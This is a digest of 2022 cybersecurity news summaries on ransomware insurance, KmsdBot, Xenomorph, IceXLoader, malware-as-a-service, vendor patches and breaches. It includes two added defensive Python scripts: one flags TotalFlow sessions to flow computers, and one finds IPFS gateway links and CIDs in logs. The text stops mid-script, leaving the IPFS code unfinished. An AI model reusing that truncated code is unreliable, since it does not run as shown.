News Items

  • news

    "Only 30% of Cyber-Insurance Holders Say Ransomware is Covered"

    According to a new study by researchers at Delinea, cyber insurance providers appear to be limiting policy coverage due to surging costs from claimants. The researchers polled 300 US-based IT decision-makers for the study. The researchers noted that although 93% of the organizations were approved for specialized cyber-insurance cover by their provider, just 30% said their policy covered "critical risks," including ransomware, ransom negotiations, and payments. Around half (48%) of the participants said their policy covers data recovery, while just a third indicated it covers incident response, regulatory fines, and third-party damages. The researchers stated that this may be because many organizations are regularly being breached and look to their providers for payouts, driving up costs for carriers. The researchers noted that some 80% of those surveyed said they've had to call on their insurance, and half of the organizations have submitted claims multiple times. As a result, many insurers are demanding that prospective policyholders implement more comprehensive security controls before they're allowed to sign up. The researchers noted that half (51%) of respondents said that security awareness training was a requirement, while 47% said the same about malware protection, AV software, multi-factor authentication (MFA), and data backups. However, the researchers noted that high-level checks might not be enough to protect insurers from surging losses, as they can't guarantee customers are properly deploying security controls.

    Infosecurity reports: "Only 30% of Cyber-Insurance Holders Say Ransomware is Covered"

  • news

    "API Abuses and Attacks Create New Challenges for Retailers"

    Imperva Threat Research has released "The State of Security Within eCommerce 2022" report, a 12-month analysis of cybersecurity threats targeting the retail industry. Account takeover, credit card fraud, web scraping, Application Programming Interface (API) abuses, Grinch bots, and Distributed Denial-of-Service (DDoS) attacks were ongoing challenges for the eCommerce industry, threatening online sales and customer satisfaction. Attacks on retailers' websites, apps, and APIs throughout the calendar year, particularly during the peak holiday shopping season, are a continuing business risk for the retail industry. According to Lynn Marks, Senior Product Manager at Imperva, the holiday shopping season is a critical period for the retail industry, and cybersecurity threats could undermine retailers' bottom lines. This industry is subject to a wide range of security threats, most of which are automated and continuous. In order to stop these persistent attacks, retailers need a unified approach that focuses on data protection and is equipped to mitigate attacks quickly without disruption for customers. Nearly 40 percent of traffic to retailers' websites in the last year did not come from humans. Instead, it came from malicious bots. The Grinch bot is notorious in the retail industry for inventory hoarding during the holiday shopping season, scooping up high-demand items and making it difficult for consumers to purchase gifts online. This article continues to discuss key findings from Imperva's "The State of Security Within eCommerce 2022" report.

    Help Net Security reports "API Abuses and Attacks Create New Challenges for Retailers"

  • news

    "Evasive KmsdBot Cryptominer/DDoS Bot Targets Gaming, Enterprises"

    Researchers have discovered an evasive malware that uses a key Internet-facing protocol to gain access to enterprise systems in order to mine cryptocurrency, launch Distributed Denial-of-Service (DDoS) attacks, and gain a foothold on corporate networks. The botnet, dubbed KmsdBot by Akamai Security Research, infects systems via a Secure Shell Protocol (SSH) connection with weak login credentials. SSH is a remote administration protocol that enables users to connect to, control, and modify remote servers via the Internet. According to Larry Cashdollar, principal security intelligence response engineer at Akamai, the botnet poses the greatest risk to enterprises that have deployed cloud infrastructure or corporate networks that are exposed to the Internet. The researchers observed that KmsdBot, which is written in Golang, targets an "erratic" range of victims as an evasive measure, including gaming and technology companies, as well as luxury car manufacturers. Golang is a programming language that is appealing to threat actors because it is difficult to reverse engineer. Furthermore, once a system is infected, the botnet does not maintain persistence, allowing it to avoid detection even further. The researchers discovered KmsdBot when it hit a honeypot they had left unusually open in the hopes of luring attackers. The first victim of the new malware they discovered was an Akamai client, FiveM, a gaming company that provides custom private servers for Grand Theft Auto online. Threat actors launched the attack by opening a User Datagram Protocol (UDP) socket and constructing a packet with a FiveM session token. This article continues to discuss researchers' findings and observations surrounding KmsdBot.

    Dark Reading reports "Evasive KmsdBot Cryptominer/DDoS Bot Targets Gaming, Enterprises"

  • news

    "These Two Google Play Store Apps Spotted Distributing Xenomorph Banking Trojan"

    Google has removed two new malicious dropper apps discovered on the Google Play Store, one of which masqueraded as a lifestyle app and was caught distributing the Xenomorph banking malware. According to Zscaler ThreatLabz researchers, Xenomorph is a Trojan that steals credentials from banking applications on users' devices. It can also intercept SMS messages and notifications, allowing it to steal one-time passwords and multi-factor authentication (MFA) requests. The cybersecurity firm also discovered an expense tracker app that displayed similar behavior, but it was unable to extract the URL used to retrieve the malware artifact. Both apps serve as droppers, which means they are harmless on their own and act as a conduit to retrieve the actual payload, which in the case of one app is hosted on GitHub. Xenomorph, first identified by ThreatFabric in February, is known to exploit Android's accessibility permissions to perform overlay attacks, in which fake login screens are displayed on top of legitimate bank apps in order to steal the victim's credentials. Furthermore, the malware uses the description of a Telegram channel to decode and construct the command-and-control (C2) domain used to receive additional commands. This article continues to discuss the distribution of the Xenomorph banking Trojan via two new malicious dropper apps on the Google Play Store.

    THN reports "These Two Google Play Store Apps Spotted Distributing Xenomorph Banking Trojan"

  • news

    "Phishing Infects Thousands of Personal And Business Computers With IceXLoader Malware"

    Due to an ongoing phishing operation, a new malware variant called "IceXLoader" has infected thousands of home and business users. The creators of IceXLoader, a malware loader discovered in the wild last summer, have released version 3.3.3 of the tool, which includes a multi-stage distribution chain and improved functionality. IceXLoader was at version 3.0 when Fortinet discovered the Nim-based malware in June 2022, but it lacked certain essential functionality and appeared to still be in development. The most recent IceXLoader release marks a departure from the project's beta development phase. IceXLoader 3.3.3 copies itself into two folders labeled with the operator's nicknames and then gathers and exfiltrates host data to the command-and-control (C2) server, including the IP address, username, machine name, Windows OS version, hardware information, presence of Framework v2.0 and/or v4.0, and more. The loader supports commands for stopping execution, restarting IceXLoader, changing the C2 server beaconing interval, loading and executing a .NET assembly, and more. This article continues to discuss the impact and capabilities of IceXLoader 3.3.3.

    CyberIntelMag reports "Phishing Infects Thousands of Personal And Business Computers With IceXLoader Malware"

  • news

    "LSU Cybersecurity Researchers Help Protect People in Immersive Virtual Reality"

    In 2020, about two million people used Virtual Reality (VR) headsets. The VR industry is expected to grow from $12 billion to $100 billion over the next five years. However, VR software developers and companies are not always implementing measures to protect consumers from being hacked. VR products are often released while still in development. Abe Baggili, a Louisiana State University (LSU) Cybersecurity Professor, is among the first in the world to investigate the security of immersive VR, or X-Reality (XR), systems and to provide solutions to this industry in order to protect people who use these new products. Everyone should be aware that all technology contains security risks. Once someone has access to an individual's device, they could steal their money by gaining access to their banking and credit card accounts, as well as cause other havoc in their life, according to Baggili. Baggili and his cybersecurity students tested a popular social and entertainment XR application, mostly used to watch movies with others in a virtual environment, to see if they could hack into users' headsets and computers. The team found that they could: they were able to take control of a user's VR headset, view their screen, activate their microphone, and install a virus on their computer without the user's knowledge. When another user entered the virtual room and interacted with the unknowingly infected user, they became infected as well, similar to how viruses spread in real life. Furthermore, the researchers were able to enter the virtual room using an unnoticed device and act as a virtual invisible peeping Tom. Many of these VR applications and headsets are being used by children and young people, making safety and security measures even more important. The structure of the physical room a person is in, as well as their eye, hand, and body movements, are all collected by VR and XR devices. According to Baggili, this information could be used to cause physical, emotional, and financial harm to a user and their family. By hacking into a VR headset and camera, the researchers were able to disorient users, delete physical boundaries, and make them walk into walls or fall down staircases in reality. This article continues to discuss the LSU cybersecurity researchers' study on protecting people in immersive VR.

    LSU reports "LSU Cybersecurity Researchers Help Protect People in Immersive Virtual Reality"

  • news

    "Study Confirms That Trust Following a Security Breach Is Best Retained When Organizations Are Up Front"

    According to new research from Durham University Business School, organizations that suffer security breaches in which customer information is compromised are far more likely to retain consumer trust if they are quick to communicate the incident and are proactive in developing a solution. The study aimed to gain more insight into the actions typically taken by organizations in the event of a security breach, as well as the resulting consumer reactions. The researchers hoped that by doing so, they would be able to guide organizations in selecting response strategies that would allow them to maintain consumers' trust and their market standing. They conducted experiments and developed a conceptual model reflecting the most common types of security breaches within eCommerce, as well as the typical response strategies of affected organizations, to capture accurate consumer appraisals of how previous security breach incidents were handled. Their investigation revealed that the key factors for retaining consumer trust after a security breach are the perceived risk, the severity of the breach, and the affected organization's response efficacy. Findings showed that consumers' reactions varied depending on the type of data that was put at risk. For example, financial and privacy risks were found to be the most significant factors in determining consumers' intentions to return to a breached organization. The affected organization's chosen response strategy proved to be the most important factor in retaining consumer trust. While it could be assumed that announcing a security breach would alarm consumers, the researchers found that by taking a more proactive approach, organizations could reduce consumer concerns while also boosting their reputation. This article continues to discuss the "Security Breaches and Organization Response Strategy: Exploring Consumers' Threat and Coping Appraisals" study.

    Continuity Central reports "Study Confirms That Trust Following a Security Breach Is Best Retained When Organizations Are Up Front"

  • news

    "GenCyber Camp Will Help Local Teachers Integrate Cybersecurity Into Lesson Plans"

    A new Binghamton University-led initiative aims to provide teachers with the resources they need to help their students navigate today's cybersecurity threats. In summer 2023, the GenCyber program will provide a free eight-day cybersecurity camp for 25 middle and high school teachers, as well as pre- and post-camp outreach activities in K-12 schools. A $136,000 National Security Agency grant to faculty members at the Thomas J. Watson College of Engineering and Applied Science's Department of Computer Science and the College of Community and Public Affairs' (CCPA) Department of Teaching, Learning, and Educational Leadership is funding the camp. The proposal's goal was to raise cybersecurity awareness in schools and communities, as well as to improve teachers' readiness to develop cybersecurity content. Another objective is to pique students' interest in cybersecurity careers. Computer and network fundamentals, cybersecurity ethics, cyberbullying, email/web/social network security, and cybersecurity careers will all be covered at the camp. Teachers who participate will receive $900, a Chromebook, lesson slides, and a T-shirt. The GenCyber camp is intended to assist teachers in navigating the New York State Board of Regents' new digital fluency learning standards, which must be implemented in schools by the fall of 2024. Part of this project involves helping teachers understand what the new standards mean and how they can be implemented in their specific subject area. The long-term goal is to create a local K-12 cybersecurity ecosystem through collaborations with schools, science centers, high-tech companies, and Binghamton University student organizations. This article continues to discuss the goals and structure of the GenCyber camp.

    Binghamton University reports "GenCyber Camp Will Help Local Teachers Integrate Cybersecurity Into Lesson Plans"

  • news

    "Insider Threat Peaks to Highest Level in Q3 2022"

    According to Kroll's "Q3 Threat Landscape: Insider Threat the Trojan Horse of 2022" report, insider threats peaked at their highest level yet in the third quarter of 2022, making up nearly 35 percent of all unauthorized access threat incidents. In the first quarter, 31 percent of all unauthorized access cases were related to insider threats, and in the second quarter, 24 percent of cases were related to insider threats. This quarter, Kroll also observed several malware infections via USB, potentially indicating broader external factors that may encourage insider threats, such as an increasingly fluid labor market and economic turbulence. The "great resignation," defined as an increase in the number of employees seeking new opportunities in the aftermath of the COVID-19 pandemic and the shift to remote work, has also coincided with an increase in the risk of insider threats, which is already exceptionally high during the employee termination process. Disgruntled employees, according to Kroll, may attempt to steal data or company secrets in order to publicly undermine an organization. Others may try to transfer data that they can use at their new organizations, such as contact lists and proprietary documents. In one instance observed by Kroll in the third quarter, an employee attempted to steal gigabytes of data by copying it to cloud storage networks. In this case, the company followed standard procedure by disabling the user's accounts and deleting data from cloud storage accounts that were accessible to them. Months after the employee left for a competitor, the company became suspicious that the individual was using company data at their new job to boost sales efforts. This article continues to discuss key findings from Kroll's new report on insider threats.

    Security Magazine reports "Insider Threat Peaks to Highest Level in Q3 2022"

  • news

    "Majority of Security Managers Lack Threat Intelligence Skills"

    Security researchers at Vulcan Cyber have found that 73% of IT security managers say they lack necessary threat intelligence (TI) skills, and 55% believe their threat intelligence data is not predictive enough. The researchers stated that the figures above are particularly striking when considering that threat intelligence is a crucial piece of risk management programs today, with 75% of companies having dedicated TI teams and 66% having dedicated threat intelligence budgets. The researchers noted that the primary use cases for threat intelligence include blocking bad IPs/URLs (64%) and integration with other security products for a comprehensive view of cyber-hygiene (63%). The researchers stated that, at the same time, the data suggests threat intelligence is a crucial source for ongoing vulnerability detection and prioritization. In fact, 87% of decision-makers rely on threat intelligence "often or very often" for vulnerability prioritization, and more than 90% of organizations rate their ability to respond based on threat intelligence as average or better. The researchers stated that teams don't just need tools and people. They need skills and the ability to use the tools at their disposal to improve the security posture of their organizations.

    Infosecurity reports: "Majority of Security Managers Lack Threat Intelligence Skills"

  • news

    "Lenovo Patches ThinkPad, Yoga, IdeaPad UEFI Secure Boot Vulnerability"

    Lenovo has issued patches to address two vulnerabilities that could have allowed cybercriminals to run malicious code by deactivating Unified Extensible Firmware Interface (UEFI) Secure Boot. According to researchers at ESET, the high-severity vulnerabilities, tracked as CVE-2022-3430 and CVE-2022-3431, could allow threat actors to bypass the basic security functions of a victim's operating system if exploited. The vulnerabilities impact 25 devices across the ThinkBook, Yoga, and IdeaPad lines, though not all of them are affected by both vulnerabilities. Because these devices are widely used in business settings, employees may be affected by the flaw, and sensitive data may be compromised. The flaw, which exists within a driver in the affected devices, lets attackers change a variable in Non-Volatile Random Access Memory (NVRAM) to alter a device's Secure Boot setting. This was not due to an error in the affected drivers' code but rather to the affected devices being shipped with drivers intended for use only during manufacturing, which allow relaxed control over Secure Boot settings from within the operating system. UEFI flaws are serious because they allow threat actors to change critical device processes and potentially install malware in the victim's flash memory. Threat actors could exploit such a flaw to install a rootkit, carrying out malicious activity while remaining undetected and even surviving operating system reinstallation. According to John Goodacre, director of the UKRI's Digital Security by Design challenge and professor of computer architectures at the University of Manchester, Secure Boot is built on a hierarchy of trust typically rooted in technologies fixed in a device's hardware. Such systems are used to ensure that, even if a vulnerability is exploited during normal system operation, the system can be recovered by rebooting. As a result, it is critical that a system's Secure Boot configuration cannot be changed while it is in normal operation. However, all software should be considered vulnerable, so it is critical that no mechanism can evade Secure Boot during normal operation. This article continues to discuss Lenovo patching high-severity vulnerabilities affecting 25 laptop models.

    ITPro reports "Lenovo Patches ThinkPad, Yoga, IdeaPad UEFI Secure Boot Vulnerability"

  • news

    "Winners Announced in First Phase of UK-US Privacy-Enhancing Technologies Prize Challenges"

    The winners of the first phase of the US-UK Privacy-Enhancing Technologies (PETs) prize challenges have been announced by the UK and US governments. Innovators are taking part in two challenge tracks: using PETs to improve the detection of financial crime and forecasting an individual's risk of infection during a pandemic, or designing a solution that meets both scenarios. The 12 prize-winning technical papers, chosen from 76 submissions, presented cutting-edge approaches to privacy-preserving federated learning, earning a total of $157,000 in prizes. They reflect the breadth and depth of technical talent in both countries, with teams from academic institutions, global technology companies, and privacy start-ups among them. The second phase of the challenges, which started earlier in November, will see participating teams construct the solutions envisioned in their technical papers. They will also have opportunities to interact with regulators and government agencies in order to help shape the development of solutions that adhere to key regulatory principles. In the second phase, innovators will compete for prizes totaling $915,000. The UK and US governments are also accepting applications for red teams to participate in the third phase of the challenges. To assess the final winners, red teams will rigorously test the privacy-preserving capabilities of the top-scoring solutions from the second phase of the challenges. Red team recruitment is now open, with applications due on November 23. Top-scoring red teams will receive prizes from a pool of $225,000. The participants' challenge problems are based on artificially generated or synthetic data sets that are representative of real-world use cases but contain no actual client information. This article continues to discuss the winners of the first phase of the US-UK PETs prize challenges.

    GOV.UK reports "Winners Announced in First Phase of UK-US Privacy-Enhancing Technologies Prize Challenges"

  • news

    "Email Is the Top Vector for Cyberattacks"

    According to a report from Tessian, 40 percent of business emails contain unwanted content. In addition, email is currently the most common method of delivering cyberattacks. Ninety-four percent of organizations experienced a spear phishing or impersonation attack this year, and 92 percent experienced ransomware attacks via email. In the first nine months of 2022, the most common type of advanced email attack was impersonation, in which attackers attempt to create legitimate-looking email addresses. This type of attack is also the most concerning email threat to security leaders. In 2022, security leaders reported an average of 148 impersonation attacks, 141 spear phishing attacks, and 138 email-based ransomware attacks. Ransomware remains a top threat, with 92 percent of global organizations experiencing at least one email-based ransomware attack in 2022 and 10 percent of security leaders surveyed reporting receiving over 450 email-based ransomware attacks since January 2022. Most organizations use a Secure Email Gateway (SEG) or native security from a cloud provider to keep employees secure on email. However, according to the report, 62 percent of security leaders believe advanced email threats bypassed SEGs in 2022. In addition, 99.5 percent of respondents believe Artificial Intelligence (AI) and Machine Learning (ML) can enhance and improve email security, with security leaders citing faster threat detection (66 percent) and more accurate threat detection (56 percent) as the top two AI benefits. This article continues to discuss key findings from Tessian's email security report.

    BetaNews reports "Email Is the Top Vector for Cyberattacks"

  • news

    "Production Systems Cybersecurity Project Receives Significant Funding"

    Business Finland has funded a consortium project investigating cybersecurity in system integration, led by Tapio Frantti, Professor of Practice at the University of Jyvaskyla Faculty of Information Technology. Production systems in Finland are controlled using techniques that are not always designed to be cyber-secure. The Cybersecurity Governance of Operational Technology (CSG) project aims to research and develop a reference model for cybersecurity system integration, which can be used to improve the cybersecurity of new power plants and their connection to the power grid. Energy production is increasing and becoming more dispersed, emphasizing the importance of cybersecurity, particularly in system integration. According to Tapio Frantti, the Professor of Practice in charge of the project, if there are safety deficiencies in an energy production system connected to the distribution network, they can be reflected in the entire national energy production and distribution system. By securing the operational functioning and integration of production and information systems, the project enables cyber-secure energy production and improves supply security. This article continues to discuss the goal and support behind the production systems cybersecurity project.

    JYU reports "Production Systems Cybersecurity Project Receives Significant Funding"

  • news

    "Could a Digital Red Cross Protect Hospitals From Ransomware?"

    Across a century of wars, the internationally recognized Red Cross symbol has marked people and facilities off-limits to attack. However, security experts are skeptical of a recent proposal to create a digital Red Cross marker to protect healthcare and humanitarian organizations from cyberattacks, with the reason being that cybercriminals cannot be trusted. The Red Cross recommendation comes as ransomware attacks on medical facilities rise and the role of cyberwarfare in the aftermath of Russia's invasion of Ukraine increases. The proposal calls for making the symbol easy for cyberattackers to find while avoiding detection by cybersecurity teams, as well as making it simple for healthcare and aid agencies to deploy. The issue is that the project would need threat actors who target healthcare to cooperate. Although nation-states recognize the Red Cross symbol on the battlefield, that relationship is nonexistent between victims and criminals, according to Michael Hamilton, CISO at Critical Insight. The intention is to draw parallels to the battlefield symbol, but Hamilton believes this will be ineffective as a deterrent. Hospitals are specifically targeted due to their importance and, as a result, their willingness to pay extortion demands. According to the Red Cross, a digital emblem should be used to identify a wide range of digital components, including servers, computers, smartphones, Internet of Things (IoT) devices, network devices, cloud infrastructure, communication equipment, and more. Errol Weiss, CSO of Healthcare-ISAC, says most attackers use a shotgun approach with emails that can reach millions of people, and once a person falls victim to a phishing attack, the attacker's priority is gaining a stronger foothold and looking for ways to monetize the breach. Perhaps they will unwind the attack once they realize what they have access to, but Weiss believes that is unlikely, noting that cybercriminals publicly declared a truce against healthcare during the height of the COVID-19 pandemic, which did not last long. They were attacking hospitals and ransoming hospitals, so they are unlikely to live up to this. This article continues to discuss the proposed digital Red Cross marker to protect healthcare and humanitarian groups from cyberattacks and why there is skepticism surrounding this idea.

    InfoRiskToday reports "Could a Digital Red Cross Protect Hospitals From Ransomware?"

  • news

    "Ransomware-as-a-Service Transforms Gangs Into Businesses"

    According to a recent threat report, Malware-as-a-Service (MaaS) is becoming more accessible to threat actors. The cyber threat group, called 'Eternity Project,' operates through a Tor website and a Telegram channel, selling malware in a systematic manner. The group offers stealer, clipper, worm, miner, ransomware, and Distributed Denial-of-Service (DDoS) bot services. Many security professionals are concerned about this, since even inexperienced cybercriminals can use Eternity to target victims with a customized threat offering. Eternity Project charges between $90 and $490 for malware. As MaaS becomes more sophisticated, it is easier than ever to obtain attack tools at a low cost. Cyble researchers found that Eternity Project provides a wide range of malware services through its Telegram channel, which has about 500 subscribers. The channel includes videos and provides detailed information about the service's features. Eternity Project's Telegram channel, like any other brand showcasing new features, shares news about malware updates. Eternity Stealer is one example of the type of harm that Eternity Project's malware can cause. This malware allows users to steal targets' passwords, cookies, credit cards, and cryptocurrency wallets, and then receive the stolen data directly on the Telegram bot. It also provides methods for breaking into messenger apps, password managers, and other software. Customers can build Eternity Stealer malware directly on the Telegram bot. When the user selects a stealer product, options to add features such as AntiVM and AntiRepeat appear. The user can then select an available payload file extension. From there, users can download the generated payload directly from the Telegram channel. This article continues to discuss the Eternity Project MaaS group, its Eternity Stealer malware, the growth in MaaS activity, and suggestions for thwarting malware attacks.

    Security Intelligence reports "Ransomware-as-a-Service Transforms Gangs Into Businesses"

  • news

    "Apple Patches Remote Code Execution Flaws in iOS, macOS"

    Apple recently released out-of-band patches for iOS and macOS to address two arbitrary code execution vulnerabilities in the libxml2 library. Written in the C programming language and originally developed for the Gnome project, libxml2 is a software library for parsing XML documents. Apple stated that the two vulnerabilities, tracked as CVE-2022-40303 and CVE-2022-40304, could lead to remote code execution. Apple has credited Google Project Zero security researchers for discovering both issues. Apple noted that for both security flaws, a remote user may be able to cause unexpected app termination or arbitrary code execution. According to Apple, the first of the flaws exists because the lack of specific limitations could lead to integer overflows. Apple noted that improved input validation resolved the issue. In the case of the second vulnerability, under specific conditions, memory errors such as double-free bugs could emerge. Apple says that improved checks fixed the defect. Apple addressed the flaws with the release of macOS Ventura 13.0.1, iOS 16.1.1, and iPadOS 16.1.1 (for iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th gen and later, and iPad mini 5th gen and later). Apple did not mention whether the vulnerabilities were being actively exploited in attacks. However, proof-of-concept (PoC) code targeting CVE-2022-40303, as well as full technical details on CVE-2022-40304, have been published online, which explains why Apple rushed the fixes.

    SecurityWeek reports: "Apple Patches Remote Code Execution Flaws in iOS, macOS"

  • news

    Visible to the public "Couple Get 40 Years for Navy Espionage Plot"

    A Maryland couple was recently sentenced to a combined 494 months behind bars after attempting to sell designs for the US Navy's nuclear-powered warships to a foreign power. Jonathan Toebbe, 44, of Annapolis, was sentenced to over 19 years in prison, while his wife Diane Toebbe got over 21 years after pleading guilty to the conspiracy in February. The Department of Justice (DoJ) stated that Jonathan Toebbe was a nuclear engineer for the Department of the Navy at the time of his arrest, working on nuclear propulsion systems. His "restricted data" security clearance gave him access to sensitive information related to military design elements, operating parameters, and performance characteristics of the reactors for nuclear-powered warships. The DoJ noted that after sending a "package" to an unnamed foreign government containing a sample of this information and instructions on how to purchase additional intelligence, Toebbe is said to have used encrypted email to correspond with an individual he believed was a representative of this government. In fact, it was an undercover FBI agent. According to the DoJ, after receiving $10,000 in cryptocurrency as a "good faith" payment from the agent, Toebbe delivered an SD card containing sensitive information, bizarrely hidden inside a peanut butter sandwich. The card included classified information on submarine nuclear reactors. After doing the same thing two more times, Toebbe and his wife were finally arrested in October 2021.

    Infosecurity reports: "Couple Get 40 Years for Navy Espionage Plot"

  • news

    Visible to the public "Medibank Confirms Data Stolen in Breach is Now Available Online"

    Medibank has recently confirmed that the criminal behind a data breach that impacted roughly four million Australians has released files on a dark web forum. According to Medibank, the leaked data includes personal data like names, addresses, dates of birth, phone numbers, email addresses, and Medicare numbers for ahm customers. Also included were passport numbers for international students and some health claim data. Julia O'Toole, CEO of MyCena Security Solutions, stated that the publishing of the data on the dark web was expected after Medibank refused to pay the attacker's ransom demand earlier this week. O'Toole noted that the information that was posted by the ransomware group is not only devastating, but victims must also be on the lookout for phishing scams coming not just through email but also via the phone and mail. O'Toole noted that the risk of identity theft has also just skyrocketed for each of the victims. O'Toole said that other countries should be warned that this cyberattack could become a template for other criminals to follow.

    Infosecurity reports: "Medibank Confirms Data Stolen in Breach is Now Available Online"

  • news

    Visible to the public "Vulnerability in Flow Computers Used by Major Oil & Gas Companies Around the World Can Allow Attackers to Remotely Control Oil or Gas Quantities and Modify Gas Bills"

    The use of flow computers, which are specialized computers that calculate oil and gas volume and flow rates, is a critical component of the production and distribution of electric power. These devices monitor liquids or gases critical for process reliability and safety, and serve as inputs for other processes (i.e., alarms, records, and settings), so precision is essential. Billing is an important aspect of flow computers' function in a utility. ABB flow computers are critical due to their widespread use in large oil and gas utilities. However, they have flaws that can allow an attacker to interfere with measurements by remotely executing code on the target device. Because flow measurement calculations, specifically those involving gas flow, need a substantial amount of computing power, they are often handled by a low-power Central Processing Unit (CPU) rather than a microcontroller. Flow meters read raw data from connected sensors, which can measure the volume of material in various ways depending on what is being measured. Examples include electromagnetic, vortex, differential pressure, thermal, and Coriolis flow meters. An investigation focused on ABB's FLO G5 flow computers. The FLO G5 is a single-board computer with a CPU, Ethernet, USB, and various IO interfaces. The CPU is an ARMv8 processor with a 32-bit architecture, and the device's operating system is Linux. The important thing to note is that the setup is done using a proprietary protocol developed by ABB called TotalFlow, which can run over either a serial or an Ethernet (TCP) connection. The TotalFlow protocol (TCP/9999) is used for most client-device communication, such as retrieving gas flow calculations, establishing and obtaining device settings, and importing and exporting configuration files. The flaw, tracked as CVE-2022-0902, has a CVSS vulnerability-severity score of 8.1 out of 10 and was recently fixed in an ABB firmware upgrade. This article continues to discuss the potential impact of the vulnerability in flow computers used by major oil and gas companies.
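
    Because TotalFlow is the channel through which settings and configuration files reach these devices, a simple defensive baseline is to alert on any TCP/9999 session to a flow computer that does not come from an approved engineering workstation. The following is an added example written for this digest, not ABB's or the researchers' code; the flow records, device addresses and the engineering allowlist are all constructed, and a real deployment would feed NetFlow or Zeek conn logs into the same check.

```python
"""Baseline check for TotalFlow (TCP/9999) sessions to flow computers.

Added example for this digest, not ABB's or the researchers' tooling.  The
inventory, allowlist and flow records below are constructed.
"""
import ipaddress

TOTALFLOW_PORT = 9999

# Assumed inventory: the flow computers and the workstation subnet allowed to
# talk TotalFlow to them (both constructed for the example).
FLOW_COMPUTERS = {
    ipaddress.ip_address("10.20.0.11"),
    ipaddress.ip_address("10.20.0.12"),
}
ENGINEERING_ALLOWLIST = ipaddress.ip_network("10.10.5.0/24")

# Constructed flow records: (source, destination, destination port, bytes).
SAMPLE_FLOWS = [
    ("10.10.5.21", "10.20.0.11", 9999, 4200),   # engineering workstation: expected
    ("10.10.5.22", "10.20.0.12", 9999, 380),
    ("10.30.7.9", "10.20.0.11", 9999, 51200),   # corporate host reaching a flow computer
    ("192.0.2.77", "10.20.0.12", 9999, 900),    # address outside the plant ranges
    ("10.30.7.9", "10.20.0.11", 443, 1200),     # not TotalFlow, ignored
]


def flag_totalflow_sessions(flows):
    """Return records that reach TotalFlow on a flow computer from outside the allowlist.

    Only port 9999 sessions whose destination is a known flow computer are
    considered; everything else is left to other rules.
    """
    flagged = []
    for src, dst, dport, nbytes in flows:
        if dport != TOTALFLOW_PORT:
            continue
        if ipaddress.ip_address(dst) not in FLOW_COMPUTERS:
            continue
        if ipaddress.ip_address(src) in ENGINEERING_ALLOWLIST:
            continue
        flagged.append((src, dst, dport, nbytes))
    return flagged


if __name__ == "__main__":
    for record in flag_totalflow_sessions(SAMPLE_FLOWS):
        print("unexpected TotalFlow session:", record)
```

    The check deliberately keys on the destination being a known flow computer rather than on the port alone, so that unrelated services that happen to use TCP/9999 do not generate noise.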

    Exploit One reports "Vulnerability in Flow Computers Used by Major Oil & Gas Companies Around the World Can Allow Attackers to Remotely Control Oil or Gas Quantities and Modify Gas Bills"

  • news

    Visible to the public "Cisco: InterPlanetary File System Seeing 'Widespread' Abuse by Hackers"

    Cisco security researchers have reported the widespread abuse of new Web3 technology by threat actors. The InterPlanetary File System (IPFS) is a data storage and sharing protocol and peer-to-peer network. It is intended to allow for the decentralized storage of resources on the Internet. It was designed to be resistant to content censorship, which means that once content is stored within the IPFS network, it cannot be effectively removed. However, Cisco Talos researchers reported widespread abuse and multiple ongoing campaigns that use the IPFS network to host malware payloads and phishing kit infrastructure while facilitating other attacks. IPFS is typically used for legitimate purposes, making it more difficult for security teams to distinguish between benign and malicious IPFS activity in their networks, according to the researchers. Currently, multiple malware families are hosted within IPFS and are retrieved during the early stages of malware attacks. The IPFS team did not respond to requests for comment. According to Cisco Talos, IPFS is being used to host phishing kits, which are websites used by phishing campaigns to collect and harvest credentials from unsuspecting victims. Hackers are also employing the technology in malware distribution campaigns because it provides low-cost storage for malicious payloads and resilience against content moderation, effectively serving as "bulletproof hosting" for adversaries. Researchers have discovered several samples in the wild that are currently utilizing IPFS. Throughout 2022, they observed an increase in the number of samples in the wild as this became a more popular hosting method for adversaries. In one campaign, victims received emails purporting to be from a Turkish financial institution but were actually part of the Agent Tesla Remote Access Trojan (RAT) infection process. This article continues to discuss the abuse of IPFS by hackers.
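
    One practical consequence of the Talos finding is that IPFS gateway URLs and content identifiers (CIDs) in proxy logs and mail links are worth surfacing for review. Below is an added example written for this digest, not Cisco Talos code: it flags lines that carry an IPFS context marker (a /ipfs/ gateway path, the subdomain gateway form, or the ipfs:// scheme) together with a syntactically valid CID. The log lines, gateway hostnames and the two CIDs are constructed.

```python
"""Flag IPFS references (gateway URLs, ipfs:// links and CIDs) in log lines.

Added example for this digest, not Cisco Talos tooling.  Sample lines,
gateway hostnames and CIDs are constructed.
"""
import re

# CIDv0: "Qm" followed by 44 base58 characters (46 characters in total).
# CIDv1 in base32 (lowercase): starts with "b", commonly "bafy"/"bafk", 50+ chars.
CID_RE = re.compile(
    r"(?<![A-Za-z0-9])"
    r"(Qm[1-9A-HJ-NP-Za-km-z]{44}|b[a-z2-7]{50,})"
    r"(?![A-Za-z0-9])"
)

# The usual ways an IPFS object is reached:
#   https://<gateway>/ipfs/<cid>/...   path gateway
#   https://<cid>.ipfs.<gateway>/...   subdomain gateway
#   ipfs://<cid>/...                   native scheme (some browsers resolve it)
IPFS_CONTEXT_RE = re.compile(r"(?:ipfs://|/ipfs/|\.ipfs\.)", re.IGNORECASE)

# Constructed identifiers with valid CIDv0 / CIDv1 syntax.
CID_V0 = "QmTestAbcDefGhJkMnPqRsTuVwXyZ123456789abcdefgh"
CID_V1 = "bafybeiconstructedcidexampleforthisdigestabcdefghij234567ab"

# Constructed proxy / mail-gateway lines.
SAMPLE_LOG = [
    "2022-11-10T09:14:02Z proxy GET https://gateway.ipfs.example/ipfs/" + CID_V0 + "/index.html 200",
    "2022-11-10T09:15:31Z proxy GET https://www.example.org/static/app.js 200",
    "2022-11-10T09:16:07Z mail link https://" + CID_V1 + ".ipfs.gateway.example/invoice.html",
    "2022-11-10T09:17:44Z proxy GET ipfs://" + CID_V0 + "/update.bin 200",
    "2022-11-10T09:18:20Z auth ok user=alice sha256=b1946ac92492d2347c6235b4d2611184",
]


def find_ipfs_references(lines):
    """Return (line_number, cid) pairs for lines that reference IPFS content.

    A line is reported only when it has an IPFS context marker and a valid
    CID; a lone CID-shaped token (random hash, hostname) is not enough, which
    keeps false positives down in busy proxy logs.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        if not IPFS_CONTEXT_RE.search(line):
            continue
        for match in CID_RE.finditer(line):
            hits.append((number, match.group(1)))
    return hits


def scan_sample():
    """Run the detector over the constructed sample log."""
    return find_ipfs_references(SAMPLE_LOG)


if __name__ == "__main__":
    for number, cid in scan_sample():
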